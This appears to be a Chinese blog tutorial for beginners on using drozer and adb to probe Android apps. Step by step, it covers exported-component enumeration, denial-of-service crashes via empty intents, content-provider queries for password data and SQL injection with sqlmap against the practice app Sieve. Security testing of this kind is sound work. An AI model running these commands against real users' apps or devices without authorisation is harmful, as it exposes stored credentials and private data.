几条命令用drozer挖漏洞(0基础)

本文针对新手介绍了如何使用Drozer工具挖掘Android应用的组件漏洞,包括数据备份与恢复、本地拒绝服务及SQL注入等。通过具体步骤指导如何连接设备、启动Drozer Agent,并利用命令行工具扫描应用包,获取组件信息,测试潜在的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

之前介绍过怎么安装drozer(drozer工具安装),本次主要面对于没有基础的新手,怎么用几条命令挖简单的组件漏洞(大部分为中危),经初次工具的使用练习,比较好挖的漏洞主要有,allowback(数据备份与恢复)、本地拒绝服务、本地sql注入。附个最近挖的部分垃圾洞:

1.磨枪上阵!

第一步:adb连接手机或者模拟器(看你心情爱用哪个用哪个)

(1)我的三星s8+需要打开usb调试,然后连接数据线后同意电脑访问设备数据,在usb连接选项处选择MIDI。

(2)夜神模拟器需要:

adb connect 127.0.0.1:62001 //adb目录下,连接夜神模拟器

连接好手机或者模拟器后查看是否连接到了设备:

adb devices      //adb目录下

第二步:打开手机端的drozer agent app,点击右下角开启,此时agent开始监听31415端口,我们用adb转发这个端口出来,连接drozer:

adb forward tcp:31415 tcp:31415  //adb目录下,进行端口转发

drozer console connect                      //drozer目录下,连接drozer agent

2.挖洞正题!

统计一下挖简单的漏洞我们要用到的命令:

run app.package.list                   //列出手机内安装的所有应用包名

run app.package.llst -f xxxx       //过滤出有指定关键字的包名

run app.package.attacksurface   com.example.sieve   //扫描攻击面,暴露了什么组件,此处以com.example.sieve包为例。

run app.activity.info -a com.example.sieve   //获取avtivity信息

run app.broadcast.info -a com.example.sieve   //获取broadcast信息

run app.provider.info -a com.example.sieve  //获取provider信息

run app.service.info -a com.example.sieve  //获取service信息

run app.activity.start --component  com.example.sieve  com.example.sieve.activity //启动某activity组件,调出越权界面或者应用崩溃存在漏洞。

run app.broadcast.send  --component  com.example.sieve  com.example.sieve.broadcast //发送空intent给广播组件,应用崩溃存在漏洞。

run scanner.provider.finduris -a  com.example.sieve //获取可以访问的uri

run app.provider.query content://com.example.sieve.xx.xxxxx/passwords --vertical  //获取uri的数据,查询到敏感数据存在漏洞。

run app.provider.query content://com.example.sieve.DBcontentprovider/password/ --projection "'" 

run app.provider.query content://com.example.sieve.DBcontentprovider/password/ --selection "'"  //输入’ 参数进行注入,报错了的话存在漏洞,可以继续使用手工注入查询数据库内容,也可使用sqlmap:

run auxiliary.webcontentresolver   //转发tcp:8080到本机,测试期间不要ctrl+c停止转发

用电脑访问:http://localhost:8080/query?uri=content://com.example.sieve.DBcontentprovider/password/&projection=*

直接sqlmap跑:

sqlmap -u "http://localhost:8080/query?uri=content://com.example.sieve.DBcontentprovider/password/&projection=*" --dbs   

//参考sqlmap的基本使用

 

之后会整理完整的drozer使用方法, 如果有其它适合新手的简单操作的建议请大家评论帮忙哦,我持续更新~

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

devi1.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值